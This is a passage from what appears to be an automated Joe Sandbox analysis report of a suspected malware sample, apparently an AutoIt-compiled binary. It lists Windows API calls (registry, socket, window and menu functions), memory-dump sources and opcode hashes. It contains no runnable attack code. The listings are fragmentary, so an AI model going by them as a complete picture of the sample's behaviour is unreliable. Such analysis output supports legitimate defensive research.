                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: d282e538b189f607b71c04e0401f01d28fd20c0163b8960d3f896126d687b388
                                                  • Instruction ID: 6301bb82eb8e9fdd01dea3d00216d77f9c789715fcc54fafaa8763e78bd870f4
                                                  • Opcode Fuzzy Hash: d282e538b189f607b71c04e0401f01d28fd20c0163b8960d3f896126d687b388
                                                  • Instruction Fuzzy Hash: 3041AF75508384AAC756EF64C841ADF77E8EF89380F00086EB89AC3251EA34D3CDD75A
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C772AA
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77351
                                                  • IsMenu.USER32(?), ref: 00C77369
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C773B1
                                                  • DrawMenuBar.USER32 ref: 00C773C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: e816720fd94bc5d2c42fd1dbae92c51ac05ccc3f06fc8ae9b626c292ab4a443f
                                                  • Instruction ID: 50607f4b2a19349c29baf0e790d18e607706ba85fcf2cb48509f312879870e1b
                                                  • Opcode Fuzzy Hash: e816720fd94bc5d2c42fd1dbae92c51ac05ccc3f06fc8ae9b626c292ab4a443f
                                                  • Instruction Fuzzy Hash: 39411875A44208EFDB20DF50D884A9EBBF4FB04314F148629FD19972A0D731AE50EF50
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C70FD4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70FFE
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C710B5
                                                    • Part of subcall function 00C70FA5: RegCloseKey.ADVAPI32(?), ref: 00C7101B
                                                    • Part of subcall function 00C70FA5: FreeLibrary.KERNEL32(?), ref: 00C7106D
                                                    • Part of subcall function 00C70FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C71090
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C71058
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 5c04f9e6d28e86856c38a7bcb89304a2ede5dd26b0f965a0d16a7a628da1079f
                                                  • Instruction ID: 3d04d0bdf628da95f62d72387ab742a710a265a6ac3d88551358e8e7f5c53e43
                                                  • Opcode Fuzzy Hash: 5c04f9e6d28e86856c38a7bcb89304a2ede5dd26b0f965a0d16a7a628da1079f
                                                  • Instruction Fuzzy Hash: 09311EB1901109BFDB25DF94DC89EFFB7BCEF08340F14416AE91AA2241D6745F859BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C762EC
                                                  • GetWindowLongW.USER32(015652E0,000000F0), ref: 00C7631F
                                                  • GetWindowLongW.USER32(015652E0,000000F0), ref: 00C76354
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C76386
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C763B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C763C1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C763DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 85da53be3d19defe8b1aaba6b89d4fa9b79c7a44be79ec56c4362b7da5db3163
                                                  • Instruction ID: f5127d236d75d659dd81e968e26bc2410d5efb8786a6aa84fd67fefe6e9e964f
                                                  • Opcode Fuzzy Hash: 85da53be3d19defe8b1aaba6b89d4fa9b79c7a44be79ec56c4362b7da5db3163
                                                  • Instruction Fuzzy Hash: A1311330640A50AFDB21DF19DC84F5937E1FB4A714F1982A8F5298F2B2CB72AD80DB51
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DB2E
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DB54
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C4DB57
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DB75
                                                  • SysFreeString.OLEAUT32(?), ref: 00C4DB7E
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4DBA3
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 614b7e7342ec40381d683293e8d47c626d7d87f88af8f90a151c1270bc5bb595
                                                  • Instruction ID: 83f84c829610d87f10bbaeab0a4570d3638c289051640cc90f3f33aa24038962
                                                  • Opcode Fuzzy Hash: 614b7e7342ec40381d683293e8d47c626d7d87f88af8f90a151c1270bc5bb595
                                                  • Instruction Fuzzy Hash: C521B232600219AFDF10EFB9DC88DBF77ACFB09360B018529F919DB251D6709D818B60
                                                  APIs
                                                    • Part of subcall function 00C67D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C67DB6
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C661C6
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C661D5
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C6620E
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00C66217
                                                  • WSAGetLastError.WSOCK32 ref: 00C66221
                                                  • closesocket.WSOCK32(00000000), ref: 00C6624A
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C66263
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: bd027e0c55247190d0de0ad7792331da6a249470653be570f9acade9c19ecea0
                                                  • Instruction ID: 840f1e1f09b468b316c448cb5332de7dced0110c198aa5714eb962604f93d71a
                                                  • Opcode Fuzzy Hash: bd027e0c55247190d0de0ad7792331da6a249470653be570f9acade9c19ecea0
                                                  • Instruction Fuzzy Hash: C3319E71600108ABDF20AF24CCC5BBE7BA8EB45764F044069F919A7291CB70AD459AA2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 5afd36a216553f262b171387a6d02648140d7a5a5e75e6c3bea5d48decc993e9
                                                  • Instruction ID: 53e2494970a57a47ec8ea813edb00f0a8abe297e37f37e15764893c59482bc20
                                                  • Opcode Fuzzy Hash: 5afd36a216553f262b171387a6d02648140d7a5a5e75e6c3bea5d48decc993e9
                                                  • Instruction Fuzzy Hash: 182146722051156AD230AA35AC02EF773E8FF56344F11403DF99687091EBA49E83E3A5
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DC09
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4DC2F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C4DC32
                                                  • SysAllocString.OLEAUT32 ref: 00C4DC53
                                                  • SysFreeString.OLEAUT32 ref: 00C4DC5C
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4DC76
                                                  • SysAllocString.OLEAUT32(?), ref: 00C4DC84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 00b5f52b90416f4b55932ebea2d40b9e11e8ff0eb28f543ec88ee95117bce14c
                                                  • Instruction ID: 5db23d0aa7056df005ef36a8de42de80799d345bf7be45e360e312d0f9c1d961
                                                  • Opcode Fuzzy Hash: 00b5f52b90416f4b55932ebea2d40b9e11e8ff0eb28f543ec88ee95117bce14c
                                                  • Instruction Fuzzy Hash: 8E215635604205AF9B10EFB9DCC8EAB77ECFB09360B108125F915CB261D6B0DD85DB64
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C77632
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C7763F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C7764A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C77659
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C77665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: a8e9872acc07479d4f36a5b6ebf69af77cdc80f378f7b7c2af181b98d20b11db
                                                  • Instruction ID: ea65fbb91138448d5564c7711edce546f9adbcfc9f65611c2dc140244d8d8504
                                                  • Opcode Fuzzy Hash: a8e9872acc07479d4f36a5b6ebf69af77cdc80f378f7b7c2af181b98d20b11db
                                                  • Instruction Fuzzy Hash: 3C1186B115011DBFEF159F65CC85EEB7F6DEF08798F114215B608A6050CA729C21DBA4
                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 00C19AE6
                                                    • Part of subcall function 00C13187: EncodePointer.KERNEL32(00000000), ref: 00C1318A
                                                    • Part of subcall function 00C13187: __initp_misc_winsig.LIBCMT ref: 00C131A5
                                                    • Part of subcall function 00C13187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C19EA0
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C19EB4
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C19EC7
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C19EDA
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C19EED
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C19F00
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C19F13
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C19F26
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C19F39
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C19F4C
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C19F5F
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C19F72
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C19F85
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C19F98
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C19FAB
                                                    • Part of subcall function 00C13187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C19FBE
                                                  • __mtinitlocks.LIBCMT ref: 00C19AEB
                                                  • __mtterm.LIBCMT ref: 00C19AF4
                                                    • Part of subcall function 00C19B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C19AF9,00C17CD0,00CAA0B8,00000014), ref: 00C19C56
                                                    • Part of subcall function 00C19B5C: _free.LIBCMT ref: 00C19C5D
                                                    • Part of subcall function 00C19B5C: DeleteCriticalSection.KERNEL32(00CAEC00,?,?,00C19AF9,00C17CD0,00CAA0B8,00000014), ref: 00C19C7F
                                                  • __calloc_crt.LIBCMT ref: 00C19B19
                                                  • __initptd.LIBCMT ref: 00C19B3B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C19B42
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: 28b911c1cbc18f6575458d1686d40c2314e50692784e0af711c6060d518b8640
                                                  • Instruction ID: 24953da7a6d0aacd5627c7eaaccbbe58a38e45eb9bed39ed95271ebf23f7c0dd
                                                  • Opcode Fuzzy Hash: 28b911c1cbc18f6575458d1686d40c2314e50692784e0af711c6060d518b8640
                                                  • Instruction Fuzzy Hash: FEF06D32A0D711AAE6347775BC237CE2690DF03734F204A29F464861D2EE3086C171A0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C13F85), ref: 00C14085
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C1408C
                                                  • EncodePointer.KERNEL32(00000000), ref: 00C14097
                                                  • DecodePointer.KERNEL32(00C13F85), ref: 00C140B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 699167c2abbe27e29a604cad208a63b6e3e53fecfea5d2b44ea92e0d8d2c6999
                                                  • Instruction ID: c07a2fb60f0145a478ca25a2ec0b7767df09cd32388f67f5f6b9ba399b4e16ee
                                                  • Opcode Fuzzy Hash: 699167c2abbe27e29a604cad208a63b6e3e53fecfea5d2b44ea92e0d8d2c6999
                                                  • Instruction Fuzzy Hash: F7E0B674585350EFEB20AF75EC4DB4D3AA8BB04746F104129F115E11F0CBB64681DB14
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
                                                  • Instruction ID: 99d8a910743ee92079aabf8bc7cf900464d8003893a0cbc6ab12de85210c571a
                                                  • Opcode Fuzzy Hash: 0b60bd368bc712a7ea268781fc090c68f80eefd966a978ec10e3bac08ccfbdc0
                                                  • Instruction Fuzzy Hash: 7C619A3450024A9BCF01EF60CC82EFE3BA5AF05308F444598FD55AB292DB74A999EB54
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C702BD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C702FD
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C70320
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C70349
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7038C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C70399
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 77547a0cd9b83b4f57d0c689b8e5f2114edeba74aff918edf7538f401d8475d5
                                                  • Instruction ID: 621be77a5971130b237b00b043077114dda78850f2f8b3aab9f0c284cc9e055e
                                                  • Opcode Fuzzy Hash: 77547a0cd9b83b4f57d0c689b8e5f2114edeba74aff918edf7538f401d8475d5
                                                  • Instruction Fuzzy Hash: A2515931108204EFC714EF64C885E6EBBE8FF85314F14895DF5998B2A2DB31E949DB52
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00C757FB
                                                  • GetMenuItemCount.USER32(00000000), ref: 00C75832
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C7585A
                                                  • GetMenuItemID.USER32(?,?), ref: 00C758C9
                                                  • GetSubMenu.USER32(?,?), ref: 00C758D7
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C75928
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: ea317867c5eff2efa4bdb978e7d77fdc5f4a7f730339e7f33da0f61b96dc7ad4
                                                  • Instruction ID: 3fc709e8edb8de98c365387d247526c3161dcec5fc51f75d94eb76af116d2343
                                                  • Opcode Fuzzy Hash: ea317867c5eff2efa4bdb978e7d77fdc5f4a7f730339e7f33da0f61b96dc7ad4
                                                  • Instruction Fuzzy Hash: DD516F35E00619EFCF11EF64C845AAEB7B4EF48350F108099E959BB391CB71AE81DB91
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C4EF06
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C4EF78
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C4EFD3
                                                  • _memmove.LIBCMT ref: 00C4EFFD
                                                  • VariantClear.OLEAUT32(?), ref: 00C4F04A
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C4F078
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
